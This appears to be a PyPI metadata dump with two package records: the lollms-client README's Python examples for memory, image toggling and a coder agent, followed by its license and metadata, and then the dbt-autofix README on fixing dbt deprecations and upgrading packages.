* **`personality_data_zone`**: A knowledge base or set of rules automatically injected from a `LollmsPersonality`'s `data_source`.
* **`pruning_summary`**: An automatic, AI-generated summary of the oldest messages in a very long chat, used to conserve tokens without losing the gist of the early conversation.

The `get_context_status()` method is your window into this system, showing you exactly how these zones are combined and how many tokens they consume.

Let's see this in action with a "Personal Assistant" agent that learns about the user over time.

```python
from lollms_client import LollmsClient, LollmsDataManager, LollmsDiscussion, MSG_TYPE
from ascii_colors import ASCIIColors
from pathlib import Path
import json
import tempfile
import os

# --- 1. Setup a persistent database for our discussion ---
with tempfile.TemporaryDirectory() as tmpdir:
    db_path = Path(tmpdir) / "my_assistant.db"
    db_manager = LollmsDataManager(f"sqlite:///{db_path}")

    try:
        lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llama3"})
    except Exception as e:
        ASCIIColors.error(f"Failed to initialize LollmsClient for stateful agent: {e}")
        exit()

    # Try to load an existing discussion or create a new one
    discussion_id = "user_assistant_chat_1"
    discussion = db_manager.get_discussion(lc, discussion_id)
    if not discussion:
        ASCIIColors.yellow("Creating a new discussion for stateful agent...")
        discussion = LollmsDiscussion.create_new(
            lollms_client=lc,
            db_manager=db_manager,
            id=discussion_id,
            autosave=True  # Important for persistence
        )
        # Let's preset some data in different zones
        discussion.system_prompt = "You are a helpful Personal Assistant."
        discussion.user_data_zone = "User's Name: Alex\nUser's Goal: Learn about AI development."
        discussion.commit()
    else:
        ASCIIColors.green("Loaded existing discussion for stateful agent.")

    def run_chat_turn(prompt: str):
        """Helper function to run a single chat turn and print details."""
        ASCIIColors.cyan(f"\n> User: {prompt}")

        # --- A. Check context status BEFORE the turn using get_context_status() ---
        ASCIIColors.magenta("\n--- Context Status (Before Generation) ---")
        status = discussion.get_context_status()
        print(f"Max Tokens: {status.get('max_tokens')}, Current Tokens: {status.get('current_tokens')}")

        # Print the system context details
        if 'system_context' in status['zones']:
            sys_ctx = status['zones']['system_context']
            print(f"  - System Context Tokens: {sys_ctx['tokens']}")
            # The 'breakdown' shows the individual zones that were combined
            for name, content in sys_ctx.get('breakdown', {}).items():
                # For brevity, show only the first line of content
                print(f"    -> Contains '{name}': {content.split(os.linesep)[0]}...")

        # Print the message history details
        if 'message_history' in status['zones']:
            msg_hist = status['zones']['message_history']
            print(f"  - Message History Tokens: {msg_hist['tokens']} ({msg_hist['message_count']} messages)")
        print("------------------------------------------")

        # --- B. Run the chat ---
        ASCIIColors.green("\n< Assistant:")
        response = discussion.chat(
            user_message=prompt,
            streaming_callback=lambda chunk, type, **k: print(chunk, end="", flush=True) if type==MSG_TYPE.MSG_TYPE_CHUNK else None
        )
        print()  # Newline after the stream

        # --- C. Trigger memorization to update the 'memory' zone ---
        ASCIIColors.yellow("\nTriggering memorization process...")
        discussion.memorize()
        discussion.commit()  # Save the new memory to the DB
        ASCIIColors.yellow("Memorization complete.")

    # --- Run a few turns ---
    run_chat_turn("Hi there! Can you recommend a good Python library for building web APIs?")
    run_chat_turn("That sounds great. By the way, my favorite programming language is Rust, I find its safety features amazing.")
    run_chat_turn("What was my favorite programming language again?")

    # --- Final Inspection of Memory ---
    ASCIIColors.magenta("\n--- Final Context Status ---")
    status = discussion.get_context_status()
    print(f"Max Tokens: {status.get('max_tokens')}, Current Tokens: {status.get('current_tokens')}")
    if 'system_context' in status['zones']:
        sys_ctx = status['zones']['system_context']
        print(f"  - System Context Tokens: {sys_ctx['tokens']}")
        for name, content in sys_ctx.get('breakdown', {}).items():
            # Print the full content of the memory zone to verify it was updated
            if name == 'memory':
                ASCIIColors.yellow(f"    -> Full '{name}' content:\n{content}")
            else:
                print(f"    -> Contains '{name}': {content.split(os.linesep)[0]}...")
    print("------------------------------------------")
```

#### How it Works:

1. **Persistence & Initialization:** The `LollmsDataManager` saves and loads the discussion. We initialize the `system_prompt` and `user_data_zone` to provide initial context.
2. **`get_context_status()`:** Before each generation, we call this method. The output shows a `system_context` block with a token count for all combined zones and a `breakdown` field that lets us see the content of each individual zone that contributed to it.
3. **`memorize()`:** After the user mentions their favorite language, `memorize()` is called. The LLM analyzes the last turn, identifies this new, important fact, and appends it to the `discussion.memory` zone.
4. **Recall:** In the final turn, when asked to recall the favorite language, the AI has access to the updated `memory` content within its system context and can correctly answer "Rust". This demonstrates true long-term, stateful memory.

### Managing Multimodal Context: Activating and Deactivating Images

When working with multimodal models, you can now control which images in a message are active and sent to the model.
This is useful for focusing the AI's attention, saving tokens on expensive vision models, or allowing a user to correct which images are relevant. This is managed at the `LollmsMessage` level using the `toggle_image_activation()` method. ```python from lollms_client import LollmsClient, LollmsDiscussion, LollmsDataManager, MSG_TYPE from ascii_colors import ASCIIColors import base64 from pathlib import Path import os import tempfile # Helper to create a dummy image b64 string def create_dummy_image(text, output_dir): try: from PIL import Image, ImageDraw, ImageFont except ImportError: ASCIIColors.warning("Pillow not installed. Skipping image example.") return None # Try to find a common font, otherwise use default font_path = Path("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf") # Common Linux path if not font_path.exists(): font_path = Path("/Library/Fonts/Arial.ttf") # Common macOS path if not font_path.exists(): font_path = Path("C:/Windows/Fonts/arial.ttf") # Common Windows path try: font = ImageFont.truetype(str(font_path), 15) except (IOError, OSError): font = ImageFont.load_default() # Fallback to default if font not found img = Image.new('RGB', (200, 50), color = (73, 109, 137)) d = ImageDraw.Draw(img) d.text((10,10), text, fill=(255,255,0), font=font) temp_file = Path(output_dir) / f"temp_img_{text.replace(' ', '_')}.png" img.save(temp_file, "PNG") b64 = base64.b64encode(temp_file.read_bytes()).decode('utf-8') temp_file.unlink() # Clean up temporary file return b64 # --- 1. Setup --- try: # Llava is a good multi-modal model for Ollama # Ensure Ollama is running and 'llava' model is pulled (e.g., ollama pull llava) lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llava"}) except Exception as e: ASCIIColors.warning(f"Failed to initialize LollmsClient for image example: {e}") ASCIIColors.warning("Skipping image activation example. 
Ensure Ollama is running and 'llava' model is pulled.") exit() with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "image_discussion_db.sqlite" db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion = LollmsDiscussion.create_new(lollms_client=lc, db_manager=db_manager) # --- 2. Add a message with multiple images --- # Ensure Pillow is installed: pip install Pillow img1_b64 = create_dummy_image("Image 1: Apple", tmpdir) img2_b64 = create_dummy_image("Image 2: Cat", tmpdir) img3_b64 = create_dummy_image("Image 3: Dog", tmpdir) if not img1_b64 or not img2_b64 or not img3_b64: ASCIIColors.warning("Skipping image activation example due to image creation failure (likely missing Pillow or font).") exit() discussion.add_message( sender="user", content="What is in the second image?", images=[img1_b64, img2_b64, img3_b64] ) user_message = discussion.get_messages()[-1] # --- 3. Check the initial state --- ASCIIColors.magenta("--- Initial State (All 3 Images Active) ---") status_before = discussion.get_context_status() # The 'content' field for message history will indicate the number of images if present print(f"Message History Text (showing active images):\n{status_before['zones']['message_history']['content']}") # --- 4. Deactivate irrelevant images --- ASCIIColors.magenta("\n--- Deactivating images 1 and 3 ---") user_message.toggle_image_activation(index=0, active=False) # Deactivate first image (Apple) user_message.toggle_image_activation(index=2, active=False) # Deactivate third image (Dog) discussion.commit() # Save changes to the message # --- 5. 
Check the new state --- ASCIIColors.magenta("\n--- New State (Only Image 2 is Active) ---") status_after = discussion.get_context_status() print(f"Message History Text (showing active images):\n{status_after['zones']['message_history']['content']}") ASCIIColors.green("\nNotice the message now says '(1 image(s) attached)' instead of 3, and only the active image will be sent to the multimodal LLM.") ASCIIColors.green("To confirm, let's ask the model what it sees:") # This will send only the activated image response = discussion.chat( user_message="What do you see in the image(s) attached to my last message?", # Use a streaming callback to see the response streaming_callback=lambda chunk, type, **k: print(chunk, end="", flush=True) if type==MSG_TYPE.MSG_TYPE_CHUNK else None ) print("\n") ASCIIColors.green(f"Assistant's response after toggling images: {response['ai_message'].content}") ``` **Note:** The image generation helper in the example requires `Pillow` (`pip install Pillow`). It also attempts to find common system fonts; if issues persist, you might need to install `matplotlib` for better font handling or provide a specific font path. ### Putting It All Together: An Advanced Agentic Example Let's create a **Python Coder Agent**. This agent will use a set of coding rules from a local file as its knowledge base and will be equipped with a tool to execute the code it writes. This demonstrates the synergy between `LollmsPersonality` (with `data_source` and `active_mcps`), `LollmsDiscussion`, and the MCP system. #### Step 1: Create the Knowledge Base (`coding_rules.txt`) Create a simple text file with the rules our agent must follow. ```text # File: coding_rules.txt 1. All Python functions must include a Google-style docstring. 2. Use type hints for all function parameters and return values. 3. The main execution block should be protected by `if __name__ == "__main__":`. 4. After defining a function, add a simple example of its usage inside the main block. 5. 
Print the output of the example usage to the console.
```

#### Step 2: The Main Script (`agent_example.py`)

This script will define the personality, initialize the client, and run the agent.

```python
from pathlib import Path
from lollms_client import LollmsClient, LollmsPersonality, LollmsDiscussion, LollmsDataManager, MSG_TYPE
from ascii_colors import ASCIIColors, trace_exception
import json
import tempfile
import os

# A detailed callback to visualize the agent's process
def agent_callback(chunk: str, msg_type: MSG_TYPE, params: dict = None, **kwargs) -> bool:
    if not params:
        params = {}
    if msg_type == MSG_TYPE.MSG_TYPE_STEP:
        ASCIIColors.yellow(f"\n>> Agent Step: {chunk}")
    elif msg_type == MSG_TYPE.MSG_TYPE_STEP_START:
        ASCIIColors.yellow(f"\n>> Agent Step Start: {chunk}")
    elif msg_type == MSG_TYPE.MSG_TYPE_STEP_END:
        result = params.get('result', '')
        # Only print a snippet of the result to avoid overwhelming the console for large outputs
        if isinstance(result, dict):
            result_str = json.dumps(result)[:150] + ("..." if len(json.dumps(result)) > 150 else "")
        else:
            result_str = str(result)[:150] + ("..."
if len(str(result)) > 150 else "") ASCIIColors.green(f"<< Agent Step End: {chunk} -> Result: {result_str}") elif msg_type == MSG_TYPE.MSG_TYPE_THOUGHT_CONTENT: ASCIIColors.magenta(f"🤔 Agent Thought: {chunk}") elif msg_type == MSG_TYPE.MSG_TYPE_TOOL_CALL: tool_name = params.get('name', 'unknown_tool') tool_params = params.get('parameters', {}) ASCIIColors.blue(f"🛠️ Agent Action: Called '{tool_name}' with {tool_params}") elif msg_type == MSG_TYPE.MSG_TYPE_TOOL_OUTPUT: ASCIIColors.cyan(f"👀 Agent Observation (Tool Output): {params.get('result', 'No result')}") elif msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) # Final answer stream return True # Create a temporary directory for the discussion DB and coding rules file with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "agent_discussion.db" # Create the coding rules file rules_path = Path(tmpdir) / "coding_rules.txt" rules_content = """ 1. All Python functions must include a Google-style docstring. 2. Use type hints for all function parameters and return values. 3. The main execution block should be protected by `if __name__ == "__main__":`. 4. After defining a function, add a simple example of its usage inside the main block. 5. Print the output of the example usage to the console. """ rules_path.write_text(rules_content.strip()) ASCIIColors.yellow(f"Created temporary coding rules file at: {rules_path}") try: # --- 1. Load the knowledge base from the file --- coding_rules = rules_path.read_text() # --- 2. Define the Coder Agent Personality --- coder_personality = LollmsPersonality( name="Python Coder Agent", author="lollms-client", category="Coding", description="An agent that writes and executes Python code according to specific rules.", system_prompt=( "You are an expert Python programmer. Your task is to write clean, executable Python code based on the user's request. " "You MUST strictly follow all rules provided in the 'Personality Static Data' section. 
" "First, think about the plan. Then, use the `python_code_interpreter` tool to write and execute the code. " "Finally, present the code and its output to the user." ), # A) Attach the static knowledge base data_source=coding_rules, # B) Equip the agent with a code execution tool active_mcps=["python_code_interpreter"] ) # --- 3. Initialize the Client and Discussion --- # A code-specialized model is recommended (e.g., codellama, deepseek-coder) # Ensure Ollama is running and 'codellama' model is pulled (e.g., ollama pull codellama) lc = LollmsClient( llm_binding_name="ollama", llm_binding_config={ "model_name": "codellama", "host_address": "http://localhost:11434" }, mcp_binding_name="local_mcp" # Enable the local tool execution engine ) # For agentic workflows, it's often good to have a persistent discussion db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion = LollmsDiscussion.create_new(lollms_client=lc, db_manager=db_manager) # --- 4. The User's Request --- user_prompt = "Write a Python function that takes two numbers and returns their sum." ASCIIColors.yellow(f"User Prompt: {user_prompt}") print("\n" + "="*50 + "\nAgent is now running...\n" + "="*50) # --- 5. Run the Agentic Chat Turn --- response = discussion.chat( user_message=user_prompt, personality=coder_personality, streaming_callback=agent_callback, max_llm_iterations=5, # Limit iterations for faster demo tool_call_decision_temperature=0.0 # Make decision more deterministic ) print("\n\n" + "="*50 + "\nAgent finished.\n" + "="*50) # --- 6. 
Inspect the results ---
        ai_message = response['ai_message']
        ASCIIColors.green("\n--- Final Answer from Agent ---")
        print(ai_message.content)

        ASCIIColors.magenta("\n--- Tool Calls Made (from metadata) ---")
        if "tool_calls" in ai_message.metadata:
            print(json.dumps(ai_message.metadata["tool_calls"], indent=2))
        else:
            print("No tool calls recorded in message metadata.")

    except Exception as e:
        ASCIIColors.error(f"An error occurred during agent execution: {e}")
        ASCIIColors.warning("Please ensure Ollama is running, 'codellama' model is pulled, and 'local_mcp' binding is available.")
        trace_exception(e)  # Provide a detailed traceback
```

#### Step 3: What Happens Under the Hood

When you run `agent_example.py`, a sophisticated process unfolds:

1. **Initialization:** The `LollmsDiscussion.chat()` method is called with the `coder_personality`.
2. **Knowledge Injection:** The `chat` method sees that `personality.data_source` is a string. It automatically takes the content of `coding_rules.txt` and injects it into the discussion's data zones.
3. **Tool Activation:** The method also sees `personality.active_mcps`. It enables the `python_code_interpreter` tool for this turn.
4. **Context Assembly:** The `LollmsClient` assembles a rich prompt for the LLM that includes:
   * The personality's `system_prompt`.
   * The content of `coding_rules.txt` (from the data zones).
   * The list of available tools (including `python_code_interpreter`).
   * The user's request ("Write a function...").
5. **Reason and Act:** The LLM, now fully briefed, reasons that it needs to use the `python_code_interpreter` tool. It formulates the Python code *according to the rules it was given*.
6. **Tool Execution:** The `local_mcp` binding receives the code and executes it in a secure local environment. It captures any output (`stdout`, `stderr`) and results.
7. **Observation:** The execution results are sent back to the LLM as an "observation."
8.
**Final Synthesis:** The LLM now has the user's request, the rules, the code it wrote, and the code's output. It synthesizes all of this into a final, comprehensive answer for the user. This example showcases how `lollms-client` allows you to build powerful, knowledgeable, and capable agents by simply composing personalities with data and tools. ## Using LoLLMs Client with Different Bindings `lollms-client` supports a wide range of LLM backends through its binding system. This section provides practical examples of how to initialize `LollmsClient` for each of the major supported bindings. ### A New Configuration Model Configuration for all bindings has been unified. Instead of passing parameters like `host_address` or `model_name` directly to the `LollmsClient` constructor, you now pass them inside a single dictionary: `llm_binding_config`. This approach provides a clean, consistent, and extensible way to manage settings for any backend. Each binding defines its own set of required and optional parameters (e.g., `host_address`, `model_name`, `service_key`, `n_gpu_layers`). ```python # General configuration pattern from lollms_client import LollmsClient # ... other imports as needed # lc = LollmsClient( # llm_binding_name="your_binding_name", # llm_binding_config={ # "parameter_1_for_this_binding": "value_1", # "parameter_2_for_this_binding": "value_2", # # ... and so on # } # ) ``` --- ### 1. Core and Local Server Bindings These bindings connect to servers running on your local network, including the core LoLLMs server itself. #### **LoLLMs (Default Binding)** This connects to a running LoLLMs service, which acts as a powerful backend providing access to models, personalities, and tools. This is the default and most feature-rich way to use `lollms-client`. **Prerequisites:** * A LoLLMs server instance installed and running (e.g., `lollms-webui`). * An API key can be generated from the LoLLMs web UI (under User Settings -> Security) if security is enabled. 
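Because the API key is optional, a common pattern is to assemble the `llm_binding_config` dictionary conditionally, reading the key from the environment so secrets stay out of source code. A minimal sketch (the `LOLLMS_API_KEY` variable name follows the comment in the usage example; the client can reportedly also pick it up on its own, so this is just an explicit illustration):

```python
import os

# Build the binding config, adding the optional API key only when the
# LOLLMS_API_KEY environment variable is set.
config = {"host_address": "http://localhost:9642"}
api_key = os.environ.get("LOLLMS_API_KEY")
if api_key:
    config["service_key"] = api_key

print(config)
```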
**Usage:**

```python
from lollms_client import LollmsClient
from ascii_colors import ASCIIColors
import os

try:
    # The default port for a LoLLMs server is 9642 (a nod to The Hitchhiker's Guide to the Galaxy).
    # The API key can also be set via the LOLLMS_API_KEY environment variable.
    config = {
        "host_address": "http://localhost:9642",
        # "service_key": "your_lollms_api_key_here"  # Uncomment and replace if security is enabled
        # "verify_ssl_certificate": True  # If False, SSL certificate verification is skipped (only relevant when the service address uses https)
    }
    lc = LollmsClient(
        llm_binding_name="lollms",  # This is the default, so specifying it is optional
        llm_binding_config=config
    )
    response = lc.generate_text("What is the answer to life, the universe, and everything?")
    ASCIIColors.green(f"\nResponse from LoLLMs: {response}")

except ConnectionRefusedError:
    ASCIIColors.error("Connection refused. Is the LoLLMs server running at http://localhost:9642?")
except ValueError as ve:
    ASCIIColors.error(f"Initialization Error: {ve}")
except Exception as e:
    ASCIIColors.error(f"An unexpected error occurred: {e}")
```
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "License :: O...
[]
null
null
>=3.7
[]
[]
[]
[ "httpx", "requests", "ascii-colors", "pipmaster>=1.0.5", "pyyaml", "tiktoken", "pydantic", "numpy", "pillow", "sqlalchemy", "jsonschema" ]
[]
[]
[]
[ "Homepage, https://github.com/ParisNeo/lollms_client" ]
twine/6.1.0 CPython/3.11.9
2026-02-19T22:10:39.219550
lollms_client-1.11.7.tar.gz
394,597
90/aa/68f91683a3a0401cc6a2a00eaddb881dacedd97aec2afd3f094e214ebfc1/lollms_client-1.11.7.tar.gz
source
sdist
null
false
cdafc6814f765f30e5f3ab46df52b90a
4d92317cea99305e46993d27319033a51f4d74ae7b44d930495a0c66bc50d399
90aa68f91683a3a0401cc6a2a00eaddb881dacedd97aec2afd3f094e214ebfc1
null
[ "LICENSE" ]
277
2.4
dbt-autofix
0.20.0
CLI to autofix deprecations in dbt projects
# dbt-autofix

dbt-autofix automatically scans your dbt project for deprecated configurations and updates them to align with the latest best practices. This makes it easier to resolve deprecation warnings introduced in dbt v1.10 as well as prepare for migration to the dbt Fusion engine.

***NEW in version 0.17.0***: dbt-autofix can now check package dependencies for compatibility with dbt Fusion and dbt 2.0 and automatically upgrade packages to newer compatible versions. See `packages` in the `Usage` section below for more detail.

There will also be cases that dbt-autofix cannot resolve, which require manual intervention. For those scenarios, using AI agents can be helpful; see the section below on [Using `AGENTS.md`](#using-agentsmd). Even if you don't intend to use LLMs, [`AGENTS.md`](./AGENTS.md) can be a very helpful guide for work that may need to be done after autofix has done its part.

## Deprecation Coverage - Project Files

The following deprecations are covered by `dbt-autofix deprecations`:

| Deprecation Code in dbt Core | Files | Handling | Support | Behavior Change |
| --- | --- | --- | --- | --- |
| `PropertyMovedToConfigDeprecation` | YAML files | Move all deprecated property-level configs under `config:` in YAML files across all resource types (models, exposures, owners, etc) | Full | No |
| `CustomKeyInObjectDeprecation` | YAML files | Move all models extra config (not valid or custom) under `meta:` and `meta` under `config:` | Full | No |
| `DuplicateYAMLKeysDeprecation` | YAML files | Remove duplicate keys in YAML files, keeping the second one to keep the same behaviour | Full | No |
| `CustomTopLevelKeyDeprecation` | YAML files | Delete custom top-level key-value pairs in YAML files | Full | No |
| `UnexpectedJinjaBlockDeprecation` | SQL files | Remove extra `{% endmacro %}` and `{% endif %}` that don't have corresponding opening statements | Full | No |
| `MissingPlusPrefixDeprecation` | `dbt_project.yml` | Prefix all built-in configs for models/tests etc... with a `+` | Partial (Does not yet prefix custom configs) | No |
| `ConfigDataPathDeprecation` | `dbt_project.yml` | Remove deprecated config for data path (now seed) | Full | No |
| `ConfigLogPathDeprecation` | `dbt_project.yml` | Remove deprecated config for log path | Full | No |
| `ConfigSourcePathDeprecation` | `dbt_project.yml` | Remove deprecated config for source path | Full | No |
| `ConfigTargetPathDeprecation` | `dbt_project.yml` | Remove deprecated config for target path | Full | No |
| `ExposureNameDeprecation` | YAML files | Replaces spaces with underscores and removes non-alphanumeric characters in exposure names | Full | Yes |
| `ResourceNamesWithSpacesDeprecation` | SQL files, YAML files | Replaces spaces with underscores in resource names, updating .sql filenames as necessary | Full | Yes |
| `SourceFreshnessProjectHooksNotRun` | `dbt_project.yml` | Set `source_freshness_run_project_hooks` in `dbt_project.yml` "flags" to true | Full | Yes |
| `MissingArgumentsPropertyInGenericTestDeprecation` | YAML files | Move any keyword arguments defined as top-level property on generic test to `arguments` property | Full | No |

## Deprecation Coverage - CLI Commands

The following deprecations are covered by `dbt-autofix jobs`:

| Deprecation Code in dbt | Handling | Support | Behavior Change |
| --- | --- | --- | --- |
| `ModelParamUsageDeprecation` | Replace -m/--model with -s/--select | Full | No |
| `CustomOutputPathInSourceFreshnessDeprecation` | Remove -o/--output usage in `dbt source freshness` commands | Full | Yes |

## Installation

### In dbt Studio

If you are using dbt Studio, no installation is needed.
You can run `dbt-autofix` in the Studio command line just like you run other commands like `dbt build`.

### From PyPi

#### With uv (recommended)

We recommend using `uv`/`uvx` to run the package. If you don't have `uv` installed, you can install `uv` and `uvx`, [following the instructions on the official website](https://docs.astral.sh/uv/getting-started/installation/).

- to run the latest version of the tool: `uvx dbt-autofix`
- to run a specific version of the tool: `uvx dbt-autofix@0.1.2`
- to install the tool as a dedicated CLI: `uv tool install dbt-autofix`
- to upgrade the tool installed as a dedicated CLI: `uv tool upgrade dbt-autofix`

#### With pip

You can also use `pip` if you prefer, but we then recommend installing the tool in its own Python virtual environment. Once in a venv, install the tool with `pip install dbt-autofix` and then run `dbt-autofix ...`

### From the source repo

To run it from the git repo directly, install `uv` [following those instructions](https://docs.astral.sh/uv/getting-started/installation/) and then:

run the tool directly

```sh
uvx --from git+https://github.com/dbt-labs/dbt-autofix.git dbt-autofix --help
```

or install it so that it can be run with `dbt-autofix` in the future

```sh
uv tool install --from git+https://github.com/dbt-labs/dbt-autofix.git dbt-autofix
```

## Usage

### `deprecations` - the main one

- `dbt-autofix deprecations`: refactor YAML and SQL files to fix some deprecations
- add `--path <mypath>` to configure the path of the dbt project (defaults to `.`)
- add `--dry-run` for running in dry run mode
- add `--json` to get resulting data in a JSONL format
- add `--json-schema-version v2.0.0-beta.4` to get the JSON schema from a specific Fusion release (by default we pick the latest)
- add `--select <path>` to only select files in a given path (by default the tool will look at all files of the dbt project)
- add `--include-packages` to also autofix the packages installed. Just note that those fixes will be reverted at the next `dbt deps` and the long term fix will be to update the packages to versions compatible with Fusion.
- add `--include-private-packages` to autofix just the _private_ packages (those not on [hub.getdbt.com](https://hub.getdbt.com/)) installed. Just note that those fixes will be reverted at the next `dbt deps` and the long term fix will be to update the packages to versions compatible with Fusion.
- add `--behavior-change` to run the _subset_ of fixes that would resolve deprecations that require a behavior change. Refer to the coverage tables above to determine which deprecations require behavior changes.
- add `--all` to run all of the fixes possible - both fixes that potentially require behavior changes as well as not. Additionally, `--all` will apply fixes to as many files as possible, even if some files are unfixable (e.g. due to invalid yaml syntax).

Each JSON object will have the following keys:

- "mode": "applied" or "dry_run"
- "file_path": the full path of the file modified. Each file will appear only once
- "refactors": the list of refactoring rules applied

Calling `deprecations` without `--dry-run` should be safe if your dbt code is part of a git repo. Please review the suggested changes to your dbt project before merging to `main` and make those changes go through your typical CI/CD process.
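The `--json` output described above is one JSON object per line (JSONL), so it is easy to post-process in CI. A small sketch of summarizing a run — the keys `mode`, `file_path`, and `refactors` come from the list above, but the sample records themselves are made up for illustration:

```python
import json

# Two made-up records in the JSONL shape described above.
jsonl_output = """\
{"mode": "dry_run", "file_path": "models/schema.yml", "refactors": ["PropertyMovedToConfigDeprecation"]}
{"mode": "dry_run", "file_path": "dbt_project.yml", "refactors": ["ConfigLogPathDeprecation", "ConfigDataPathDeprecation"]}
"""

# Each line is an independent JSON document, so parse line by line.
records = [json.loads(line) for line in jsonl_output.splitlines()]
total_refactors = sum(len(r["refactors"]) for r in records)
for r in records:
    print(f"{r['file_path']}: {len(r['refactors'])} refactor(s)")
print(f"{total_refactors} refactors across {len(records)} files")
```

A script like this could, for example, fail a CI job whenever a dry run reports a non-zero refactor count.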
### `packages` - the new one

- `dbt-autofix packages`: scan package dependencies for compatibility with Fusion and dbt 2.0 and modify packages.yml or dependencies.yml to upgrade any incompatible packages to a newer compatible version
- add `--force-upgrade` to override the version range currently defined in your project's packages.yml/dependencies.yml
- add `--path <mypath>` to configure the path of the dbt project (defaults to `.`)
- add `--dry-run` for running in dry run mode
- add `--json` to get resulting data in a JSONL format

If any packages are upgraded, you must run `dbt deps` in your project to install the new versions and update your lock file.

Each JSON object will have the following keys:

- "mode": "applied" or "dry_run"
- "file_path": the full path of the file modified
- "upgrades": the list of packages upgraded to newer versions
- "unchanged": the list of packages not upgraded and the reason for not upgrading, including:
  - Package is already compatible with Fusion and no update is required
  - Package is not compatible with Fusion and Package Hub does not have a newer version with Fusion compatibility
  - Package has not defined Fusion compatibility using `require-dbt-version`

Calling `packages` without `--dry-run` should be safe if your dbt code is part of a git repo. Please review the suggested changes to your dbt project before merging to `main` and make those changes go through your typical CI/CD process.

### `jobs`

`dbt-autofix jobs`: update dbt platform jobs steps to use `-s`/`--select` selectors instead of `-m`/`--models`/`--model`, which are deprecated in the Fusion engine.

Run `dbt-autofix jobs --help` to see the required parameters and supported arguments.
This tool requires connecting to the dbt Admin API to retrieve and update jobs, which means that the user token or service token used needs to have Read and Write access to jobs.

Running with `--dry-run` will output what changes would have been triggered without triggering them.

Running with `--behavior-changes` will run the _subset_ of fixes that would resolve deprecations that require a behavior change. Refer to the coverage tables above to determine which deprecations require behavior changes.

### Using `AGENTS.md`

[`AGENTS.md`](./AGENTS.md) is provided as a reference and starting place for those interested in using AI agents in Cursor, Copilot Chat, and Claude Code to try resolving remaining errors after running dbt-autofix.

**To use AGENTS.md:**

1. Download AGENTS.md and the /manual_fixes/ directory (you can remove these files after using the agentic autofix workflow)
2. Add AGENTS.md as context to the chat or Claude Code
3. Be very specific in your prompt to provide the proper guardrails and avoid AI hallucinations

**Sample prompt:**

Please make my dbt project compatible with Fusion by strictly following the instructions in AGENTS.md. Please read AGENTS.md and dependent resources in full before you start, and take time planning and thinking through steps.

**Share your manual fixes!**

Have you had to make manual adjustments to get your dbt project working with Fusion? We’d love for you to contribute them back to the community through this agentic workflow! The `/manual_fixes/` folder is a collection of real examples where users have solved compatibility issues manually, and we would love your contribution to it. Your contribution helps improve autofix for everyone and can prevent others from hitting the same issue.

### Pre-commit Hooks

You can use `dbt-autofix` as a pre-commit hook to automatically catch and fix deprecations before committing code.
Add the following to your `.pre-commit-config.yaml`:

```yaml
repos:
  - repo: https://github.com/dbt-labs/dbt-autofix
    rev: v0.13.x  # or 'main' or 'HEAD'
    hooks:
      - id: dbt-autofix-check  # Check for deprecations without making changes
      # OR
      - id: dbt-autofix-fix  # Automatically fix deprecations
      # OR
